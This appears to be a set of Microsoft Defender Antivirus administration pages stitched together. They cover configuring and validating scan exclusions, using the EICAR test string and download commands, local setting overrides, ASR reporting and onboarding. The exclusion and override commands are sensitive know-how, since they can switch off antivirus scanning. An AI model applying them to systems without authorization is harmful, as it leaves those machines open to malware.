-See [How to create and deploy antimalware policies: Exclusion settings](/configmgr/protect/deploy-use/endpoint-antimalware-policies#exclusion-settings) for details on configuring Microsoft Configuration Manager (current branch).
-
-### Use Group Policy to configure folder or file extension exclusions
-
-> [!NOTE]
-> If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and sub-directories under that folder are excluded.
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**, and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Exclusions**.
-
-4. Open the **Path Exclusions** setting for editing, and add your exclusions.
-
- 1. Set the option to **Enabled**.
- 2. Under the **Options** section, select **Show**.
- 3. Specify each folder on its own line under the **Value name** column.
- 4. If you are specifying a file, ensure that you enter a fully qualified path to the file, including the drive letter, folder path, file name, and extension.
- 5. Enter **0** in the **Value** column.
-
-5. Choose **OK**.
-
-6. Open the **Extension Exclusions** setting for editing and add your exclusions.
-
- 1. Set the option to **Enabled**.
- 2. Under the **Options** section, select **Show**.
- 3. Enter each file extension on its own line under the **Value name** column.
- 4. Enter **0** in the **Value** column.
-
-7. Choose **OK**.
-
-<a id="ps"></a>
-
-### Use PowerShell cmdlets to configure file name, folder, or file extension exclusions
-
-Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of three cmdlets and appropriate exclusion list parameter. The cmdlets are all in the [Defender module](/powershell/module/defender/).
-
-The format for the cmdlets is as follows:
-
-```PowerShell
-<cmdlet> -<exclusion list> "<item>"
-```
-
-The following table lists cmdlets that you can use in the `<cmdlet>` portion of the PowerShell cmdlet:
-
-|Configuration action|PowerShell cmdlet|
-|:|:|
-|Create or overwrite the list|`Set-MpPreference`|
-|Add to the list|`Add-MpPreference`|
-|Remove item from the list|`Remove-MpPreference`|
-
-The following table lists values that you can use in the `<exclusion list>` portion of the PowerShell cmdlet:
-
-|Exclusion type|PowerShell parameter|
-|||
-|All files with a specified file extension|`-ExclusionExtension`|
-|All files under a folder (including files in sub-directories), or a specific file|`-ExclusionPath`|
-
-> [!IMPORTANT]
-> If you have created a list, either with `Set-MpPreference` or `Add-MpPreference`, using the `Set-MpPreference` cmdlet again overwrites the existing list.
-
-For example, the following code snippet would cause Microsoft Defender Antivirus scans to exclude any file with the `.test` file extension:
-
-```PowerShell
-Add-MpPreference -ExclusionExtension ".test"
-```
-
-> [!TIP]
-> For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-### Use Windows Management Instrumentation (WMI) to configure file name, folder, or file extension exclusions
-
-Use the [Set, Add, and Remove methods of the MSFT_MpPreference](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-ExclusionExtension
-ExclusionPath
-```
-
-Using **Set**, **Add**, and **Remove** is analogous to their counterparts in PowerShell: `Set-MpPreference`, `Add-MpPreference`, and `Remove-MpPreference`.
-
-> [!TIP]
-> For more information, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-<a id="man-tools"></a>
-
-### Use the Windows Security app to configure file name, folder, or file extension exclusions
-
-See [Add exclusions in the Windows Security app](microsoft-defender-security-center-antivirus.md) for instructions.
-
-<a id="wildcards"></a>
-
-## Use wildcards in the file name and folder path or extension exclusion lists
-
-You can use the asterisk `*`, question mark `?`, or environment variables (such as `%ALLUSERSPROFILE%`) as wildcards when defining items in the file name or folder path exclusion list. The way these wildcards are interpreted differs from their usual usage in other apps and languages. Make sure to read this section to understand their specific limitations.
-
-> [!IMPORTANT]
-> There are key limitations and usage scenarios for these wildcards:
-> - Environment variable usage is limited to machine variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account.
-> - You can only use a maximum of six wildcards per entry.
-> - You cannot use a wildcard in place of a drive letter.
-> - An asterisk `*` in a folder exclusion stands in place for a single folder. Use multiple instances of `\*\` to indicate multiple nested folders with unspecified names.
-
-The following table describes how the wildcards can be used and provides some examples.
-
-|Wildcard|Examples|
-|||
-|`*` (asterisk) <br/><br/> In **file name and file extension inclusions**, the asterisk replaces any number of characters, and only applies to files in the last folder defined in the argument. <br/><br/> In **folder exclusions**, the asterisk replaces a single folder. Use multiple `*` with folder slashes `\` to indicate multiple nested folders. After matching the number of wild carded and named folders, all subfolders are also included.|`C:\MyData\*.txt` includes `C:\MyData\notes.txt` <br/><br/> `C:\somepath\*\Data` includes any file in `C:\somepath\Archives\Data` and its subfolders, and `C:\somepath\Authorized\Data` and its subfolders <br/><br/> `C:\Serv\*\*\Backup` includes any file in `C:\Serv\Primary\Denied\Backup` and its subfolders, and `C:\Serv\Secondary\Allowed\Backup` and its subfolders|
-|`?` (question mark) <br/><br/> In **file name and file extension inclusions**, the question mark replaces a single character, and only applies to files in the last folder defined in the argument. <br/><br/> In **folder exclusions**, the question mark replaces a single character in a folder name. After matching the number of wild carded and named folders, all subfolders are also included.|`C:\MyData\my?.zip` includes `C:\MyData\my1.zip` <br/><br/> `C:\somepath\?\Data` includes any file in `C:\somepath\P\Data` and its subfolders <br/><br/> `C:\somepath\test0?\Data` would include any file in `C:\somepath\test01\Data` and its subfolders|
-|Environment variables <br/><br/> The defined variable is populated as a path when the exclusion is evaluated.|`%ALLUSERSPROFILE%\CustomLogFiles` would include `C:\ProgramData\CustomLogFiles\Folder1\file1.txt`|
-
-> [!IMPORTANT]
-> If you mix a file exclusion argument with a folder exclusion argument, the rules stop at the file argument match in the matched folder, and don't look for file matches in any subfolders.
-> For example, you can exclude all files that start with "date" in the folders `c:\data\final\marked` and `c:\data\review\marked` by using the rule argument `c:\data\*\marked\date*`.
-> This argument doesn't match any files in subfolders under `c:\data\final\marked` or `c:\data\review\marked`.
-
-<a id="review"></a>
-
-### System environment variables
-
-The following table lists and describes the system account environment variables.
-
-|This system environment variable...|Redirects to this|
-|||
-|`%APPDATA%`|`C:\Windows\system32\config\systemprofile\Appdata\Roaming`|
-|`%APPDATA%\Microsoft\Internet Explorer\Quick Launch`|`C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch`|
-|`%APPDATA%\Microsoft\Windows\Start Menu`|`C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu`|
-|`%APPDATA%\Microsoft\Windows\Start Menu\Programs`|`C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs`|
-|`%LOCALAPPDATA%`|`C:\WINDOWS\system32\config\systemprofile\AppData\Local`|
-|`%ProgramData%`|`C:\ProgramData`|
-|`%ProgramFiles%`|`C:\Program Files`|
-|`%ProgramFiles%\Common Files`|`C:\Program Files\Common Files`|
-|`%ProgramFiles%\Windows Sidebar\Gadgets`|`C:\Program Files\Windows Sidebar\Gadgets`|
-|`%ProgramFiles%\Common Files`|`C:\Program Files\Common Files`|
-|`%ProgramFiles(x86)%`|`C:\Program Files (x86)`|
-|`%ProgramFiles(x86)%\Common Files`|`C:\Program Files (x86)\Common Files`|
-|`%SystemDrive%`|`C:`|
-|`%SystemDrive%\Program Files`|`C:\Program Files`|
-|`%SystemDrive%\Program Files (x86)`|`C:\Program Files (x86)`|
-|`%SystemDrive%\Users`|`C:\Users`|
-|`%SystemDrive%\Users\Public`|`C:\Users\Public`|
-|`%SystemRoot%`|`C:\Windows`|
-|`%windir%`|`C:\Windows`|
-|`%windir%\Fonts`|`C:\Windows\Fonts`|
-|`%windir%\Resources`|`C:\Windows\Resources`|
-|`%windir%\resources\0409`|`C:\Windows\resources\0409`|
-|`%windir%\system32`|`C:\Windows\System32`|
-|`%ALLUSERSPROFILE%`|`C:\ProgramData`|
-|`%ALLUSERSPROFILE%\Application Data`|`C:\ProgramData\Application Data`|
-|`%ALLUSERSPROFILE%\Documents`|`C:\ProgramData\Documents`|
-|`%ALLUSERSPROFILE%\Documents\My Music\Sample Music`|`C:\ProgramData\Documents\My Music\Sample Music`|
-|`%ALLUSERSPROFILE%\Documents\My Music`|`C:\ProgramData\Documents\My Music`|
-|`%ALLUSERSPROFILE%\Documents\My Pictures`|`C:\ProgramData\Documents\My Pictures`|
-|`%ALLUSERSPROFILE%\Documents\My Pictures\Sample Pictures`|`C:\ProgramData\Documents\My Pictures\Sample Pictures`|
-|`%ALLUSERSPROFILE%\Documents\My Videos`|`C:\ProgramData\Documents\My Videos`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\DeviceMetadataStore`|`C:\ProgramData\Microsoft\Windows\DeviceMetadataStore`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\GameExplorer`|`C:\ProgramData\Microsoft\Windows\GameExplorer`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Ringtones`|`C:\ProgramData\Microsoft\Windows\Ringtones`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu`|`C:\ProgramData\Microsoft\Windows\Start Menu`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs`|`C:\ProgramData\Microsoft\Windows\Start Menu\Programs`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools`|`C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp`|`C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`|
-|`%ALLUSERSPROFILE%\Microsoft\Windows\Templates`|`C:\ProgramData\Microsoft\Windows\Templates`|
-|`%ALLUSERSPROFILE%\Start Menu`|`C:\ProgramData\Start Menu`|
-|`%ALLUSERSPROFILE%\Start Menu\Programs`| `C:\ProgramData\Start Menu\Programs`|
-|`%ALLUSERSPROFILE%\Start Menu\Programs\Administrative Tools`|`C:\ProgramData\Start Menu\Programs\Administrative Tools`|
-|`%ALLUSERSPROFILE%\Templates`|`C:\ProgramData\Templates`|
-|`%LOCALAPPDATA%\Microsoft\Windows\ConnectedSearch\Templates`|`C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\ConnectedSearch\Templates`|
-|`%LOCALAPPDATA%\Microsoft\Windows\History`|`C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History`|
-|`%PUBLIC%`|`C:\Users\Public`|
-|`%PUBLIC%\AccountPictures`|`C:\Users\Public\AccountPictures`|
-|`%PUBLIC%\Desktop`|`C:\Users\Public\Desktop`|
-|`%PUBLIC%\Documents`|`C:\Users\Public\Documents`|
-|`%PUBLIC%\Downloads`|`C:\Users\Public\Downloads`|
-|`%PUBLIC%\Music\Sample Music`|`C:\Users\Public\Music\Sample Music`|
-|`%PUBLIC%\Music\Sample Playlists`|`C:\Users\Public\Music\Sample Playlists`|
-|`%PUBLIC%\Pictures\Sample Pictures`|`C:\Users\Public\Pictures\Sample Pictures`|
-|`%PUBLIC%\RecordedTV.library-ms`|`C:\Users\Public\RecordedTV.library-ms`|
-|`%PUBLIC%\Videos`|`C:\Users\Public\Videos`|
-|`%PUBLIC%\Videos\Sample Videos`|`C:\Users\Public\Videos\Sample Videos`|
-|`%USERPROFILE%`|`C:\Windows\system32\config\systemprofile`|
-|`%USERPROFILE%\AppData\Local`|`C:\Windows\system32\config\systemprofile\AppData\Local`|
-|`%USERPROFILE%\AppData\LocalLow`|`C:\Windows\system32\config\systemprofile\AppData\LocalLow`|
-|`%USERPROFILE%\AppData\Roaming`|`C:\Windows\system32\config\systemprofile\AppData\Roaming`|
-
-## Review the list of exclusions
-
-You can retrieve the items in the exclusion list by using one of the following methods:
--- [Intune](/mem/intune/fundamentals/deployment-guide-intune-setup)-- [Microsoft Configuration Manager](/configmgr/protect/deploy-use/endpoint-antimalware-policies)-- [MpCmdRun](command-line-arguments-microsoft-defender-antivirus.md)-- [PowerShell](/powershell/module/defender)-- [Windows Security app](microsoft-defender-security-center-antivirus.md)-
-> [!IMPORTANT]
-> Exclusion list changes made with Group Policy **will show** in the lists of [Windows Security app](microsoft-defender-security-center-antivirus.md).
-> Changes made in the Windows Security app **will not show** in the Group Policy lists.
-
-If you use PowerShell, you can retrieve the list in the following two ways:
--- Retrieve the status of all Microsoft Defender Antivirus preferences. Each list is displayed on separate lines, but the items within each list are combined into the same line.-- Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of `Add-MpPreference` is written to a new line.-
-### Validate the exclusion list by using MpCmdRun
-
-To check exclusions with the dedicated [command-line tool mpcmdrun.exe](./command-line-arguments-microsoft-defender-antivirus.md), use the following command:
-
-```console
-Start, CMD (Run as admin)
-cd "%programdata%\microsoft\windows defender\platform"
-cd 4.18.2111-5.0 (Where 4.18.2111-5.0 is this month's Microsoft Defender Antivirus "Platform Update".)
-MpCmdRun.exe -CheckExclusion -path <path>
-```
-
-> [!NOTE]
-> Checking exclusions with `MpCmdRun` requires Microsoft Defender Antivirus [version 4.18.2111-5.0 (released in December 2021)](/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support#november-2021-platform-41821115--engine-11188004) or later.
-
-### Review the list of exclusions alongside all other Microsoft Defender Antivirus preferences by using PowerShell
-
-Use the following cmdlet:
-
-```PowerShell
-Get-MpPreference
-```
-
-In the following example, the items contained in the `ExclusionExtension` list are highlighted:
--
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-### Retrieve a specific exclusions list by using PowerShell
-
-Use the following code snippet (enter each line as a separate command); replace **WDAVprefs** with whatever label you want to name the variable:
-
-```PowerShell
-$WDAVprefs = Get-MpPreference
-$WDAVprefs.ExclusionExtension
-$WDAVprefs.ExclusionPath
-```
-
-In the following example, the list is split into new lines for each use of the `Add-MpPreference` cmdlet:
--
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-<a id="validate"></a>
-
-## Validate exclusions lists with the EICAR test file
-
-You can validate that your exclusion lists are working by using PowerShell with either the `Invoke-WebRequest` cmdlet or the .NET WebClient class to download a test file.
-
-In the following PowerShell snippet, replace `test.txt` with a file that conforms to your exclusion rules. For example, if you have excluded the `.testing` extension, replace `test.txt` with `test.testing`. If you're testing a path, make sure that you run the cmdlet within that path.
-
-```PowerShell
-Invoke-WebRequest "https://secure.eicar.org/eicar.com.txt" -OutFile "test.txt"
-```
-
-If Microsoft Defender Antivirus reports malware, then the rule is not working. If there is no report of malware and the downloaded file exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the [EICAR test file website](https://www.eicar.org/download-anti-malware-testfile/).
-
-You can also use the following PowerShell code, which calls the .NET WebClient class to download the test file - as with the `Invoke-WebRequest` cmdlet; replace `c:\test.txt` with a file that conforms to the rule you are validating:
-
-```PowerShell
-$client = new-object System.Net.WebClient
-$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")
-```
-
-If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the following PowerShell command:
-
-```PowerShell
-[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
-```
-
-You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)
security Configure Local Policy Overrides Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus.md
- Title: Configure local overrides for Microsoft Defender Antivirus settings
-description: Enable or disable users from locally changing settings in Microsoft Defender Antivirus.
------ Previously updated : 07/13/2023----- m365-security-- tier2-- mde-ngp--
-# Prevent or allow users to locally modify Microsoft Defender Antivirus policy settings
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-By default, Microsoft Defender Antivirus settings that are deployed via a Group Policy Object to the endpoints in your network will prevent users from locally changing the settings. You can change this configuration in some instances. For example, it might be necessary to allow certain user groups, such as security researchers and threat investigators, to have further control over individual settings on the endpoints they use.
-
-## Configure local overrides for Microsoft Defender Antivirus settings
-
-The default setting for these local override policies is **Disabled**.
-
-If the policies are set to **Enabled**, users can make changes to the associated settings on their devices by using the [Windows Security](microsoft-defender-security-center-antivirus.md) app, local Group Policy settings, or PowerShell cmdlets (where appropriate).
-
-The [table of settings section](#table-of-settings) lists override policy settings and the configuration instructions.
-
-To configure these settings:
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** > **Microsoft Defender Antivirus** and then the **Location** specified in the [table of settings section](#table-of-settings) (in this article).
-
-4. Double-click the policy **Setting** as specified in the table below, and set the option to your desired configuration. Select **OK**, and repeat for any other settings.
-
-5. Deploy the Group Policy Object as usual.
-
-## Table of settings
-
-| Location | Setting | Article |
-|||||
-| MAPS |Configure local setting override for reporting to Microsoft MAPS|[Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) |
-| Quarantine|Configure local setting override for the removal of items from Quarantine folder|[Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md) |
-| Real-time protection|Configure local setting override for monitoring file and program activity on your computer|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md) |
-| Real-time protection|Configure local setting override for monitoring for incoming and outgoing file activity | [Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md) |
-| Real-time protection|Configure local setting override for scanning all downloaded files and attachments|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md) |
-| Real-time protection|Configure local setting override for turn on behavior monitoring|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md) |
-| Real-time protection|Configure local setting override to turn on real-time protection|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md) |
-| Remediation|Configure local setting override for the time of day to run a scheduled full scan to complete remediation|[Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md) |
-| Scan|Configure local setting override for maximum percentage of CPU utilization|[Configure and run scans](run-scan-microsoft-defender-antivirus.md) |
-| Scan|Configure local setting override for schedule scan day|[Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) |
-| Scan|Configure local setting override for scheduled quick scan time|[Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) |
-| Scan|Configure local setting override for scheduled scan time|[Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) |
-| Scan|Configure local setting override for the scan type to use for a scheduled scan|[Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) |
-
-<a id="merge-lists"></a>
-
-## Configure how locally and globally defined threat remediation and exclusions lists are merged
-
-You can also configure how locally defined lists are combined or merged with globally defined lists. This setting applies to [exclusion lists](configure-exclusions-microsoft-defender-antivirus.md), [specified remediation lists](configure-remediation-microsoft-defender-antivirus.md), and [attack surface reduction](/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction).
-
-By default, lists that have been configured in local group policy and the Windows Security app are merged with lists that are defined by the appropriate Group Policy Object that you have deployed on your network. Where there are conflicts, the globally defined list takes precedence. You can disable this setting to ensure that only globally defined lists (such as those from any deployed GPOs) are used.
-
-### Use Group Policy to disable local list merging
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and click **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** > **Microsoft Defender Antivirus**.
-
-4. Double-click **Configure local administrator merge behavior for lists** and set the option to **Disabled**. Then select **OK**.
-
-> [!NOTE]
-> For "Administrative Templates (.admx) for Windows 11 2022 Update (22H2)" and "Administrative Templates (.admx) for Windows 10 November 2021 Update (21H2)" templates, set **Configure local administrator merge behavior for lists** to **Enabled** to disable the local administrator merge behavior.
-
-### Use Microsoft Intune to disable local list merging
-
-1. In the [Microsoft Intune admin center](https://endpoint.microsoft.com), select **Endpoint security** > **Antivirus**.
-
-2. Choose **Create Policy**, or modify an existing Microsoft Defender Antivirus policy.
-
-3. Under the **Configuration settings**, select the drop-down next to **Disable Local Admin Merge** and select **Disable Local Admin Merge**.
-
-> [!NOTE]
-> If you disable local list merging, it will override controlled folder access settings. It also overrides any protected folders or allowed apps set by the local administrator. For more information about controlled folder access settings, see [Allow a blocked app in Windows Security](https://support.microsoft.com/help/4046851/windows-10-allow-blocked-app-windows-security).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related topics
--- [Microsoft Intune](/mem/intune/protect/advanced-threat-protection-configure)-- [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-in-windows-10.md)-- [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md)
security Configure Machines Asr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-asr.md
- Title: Optimize ASR rule deployment and detections
-description: Optimize your attack surface reduction rules to identify and prevent typical malware exploits.
------- m365-security-- tier2-- mde-asr--- Previously updated : 12/18/2023--
-# Optimize ASR rule deployment and detections
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-[Attack surface reduction rules](./attack-surface-reduction.md) identify and prevent typical malware exploits. They control when and how potentially malicious code can run. For example, they can prevent JavaScript or VBScript from launching a downloaded executable, block Win32 API calls from Office macros, and block processes that run from USB drives.
--
-> *Attack surface management card*
-
-The *Attack surface management card* is an entry point to tools in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> that you can use to:
--- Understand how ASR rules are currently deployed in your organization.-- Review ASR detections and identify possible incorrect detections.-- Analyze the impact of exclusions and generate the list of file paths to exclude.-
-Select **Go to attack surface management** \> **Reports** \> **Attack surface reduction rules** \> **Add exclusions**. From there, you can navigate to other sections of Microsoft Defender portal.
--
-> *The **Add exclusions** tab in the Attack surface reduction rules page in Microsoft Defender portal*
-
-> [!NOTE]
-> To access Microsoft Defender portal, you need a Microsoft 365 E3 or E5 license and an account that has certain roles on Microsoft Entra ID. [Read about required licenses and permissions](/microsoft-365/security/defender/prerequisites).
-
-For more information about ASR rule deployment in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, see [Optimize ASR rule deployment and detections](configure-machines-asr.md).
-
-## Related topics
--- [Ensure your devices are configured properly](configure-machines.md)-- [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md)-- [Monitor compliance to the Microsoft Defender for Endpoint security baseline](configure-machines-security-baseline.md)
security Configure Machines Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-onboarding.md
- Title: Get devices onboarded to Microsoft Defender for Endpoint
-description: Track onboarding of Intune-managed devices to Microsoft Defender for Endpoint and increase onboarding rate.
------- m365-security-- tier2-- Previously updated : 12/18/2023--
-# Get devices onboarded to Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-Each onboarded device adds an additional endpoint detection and response (EDR) sensor and increases visibility over breach activity in your network. Onboarding also ensures that a device can be checked for vulnerable components as well security configuration issues and can receive critical remediation actions during attacks.
-
-Before you can track and manage onboarding of devices:
--- [Enroll your devices to Intune management](configure-machines.md#enroll-devices-to-intune-management)-- [Ensure you have the necessary permissions](configure-machines.md#obtain-required-permissions)-
-Watch this video to learn how to easily onboard clients with Microsoft Defender for Endpoint.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?rel=0]
-
-## Discover and track unprotected devices
-
-The **Onboarding** card provides a high-level overview of your onboarding rate by comparing the number of Windows devices that have actually onboarded to Defender for Endpoint against the total number of Intune-managed Windows devices.
--
-*Card showing onboarded devices compared to the total number of Intune-managed Windows devices*
-
-> [!NOTE]
-> If you used Configuration Manager, the onboarding script, or other onboarding methods that don't use Intune profiles, you might encounter data discrepancies. To resolve these discrepancies, create a corresponding Intune configuration profile for Defender for Endpoint onboarding and assign that profile to your devices.
-
-## Onboard more devices with Intune profiles
-
-Defender for Endpoint provides several convenient options for [onboarding Windows devices](onboard-configure.md). For Intune-managed devices, however, you can leverage Intune profiles to conveniently deploy the Defender for Endpoint sensor to select devices, effectively onboarding these devices to the service.
-
-From the **Onboarding** card, select **Onboard more devices** to create and assign a profile on Intune. The link takes you to the device compliance page on Intune, which provides a similar overview of your onboarding state.
--
-*Microsoft Defender for Endpoint device compliance page on Intune device management*
-
-> [!TIP]
-> Alternatively, you can navigate to the Defender for Endpoint onboarding compliance page in the [Microsoft Azure portal](https://portal.azure.com/) from **All services > Intune > Device compliance > Microsoft Defender ATP**.
-
-> [!NOTE]
-> If you want to view the most up-to-date device data, click on **List of devices without ATP sensor**.
-
-From the device compliance page, create a configuration profile specifically for the deployment of the Defender for Endpoint sensor and assign that profile to the devices you want to onboard. To do this, you can either:
--- Select **Create a device configuration profile to configure ATP sensor** to start with a predefined device configuration profile.-- Create the device configuration profile from scratch.-
-For more information, [read about using Intune device configuration profiles to onboard devices to Defender for Endpoint](/intune/advanced-threat-protection#onboard-devices-by-using-a-configuration-profile).
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-belowfoldlink)
-
-## Related topics
--- [Ensure your devices are configured properly](configure-machines.md)-- [Increase compliance to the Defender for Endpoint security baseline](configure-machines-security-baseline.md)-- [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Configure Machines Security Baseline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-security-baseline.md
- Title: Increase compliance to the Microsoft Defender for Endpoint security baseline
-description: The Microsoft Defender for Endpoint security baseline sets security controls to provide optimal protection.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Increase compliance to the Microsoft Defender for Endpoint security baseline
--
-**Applies to:**
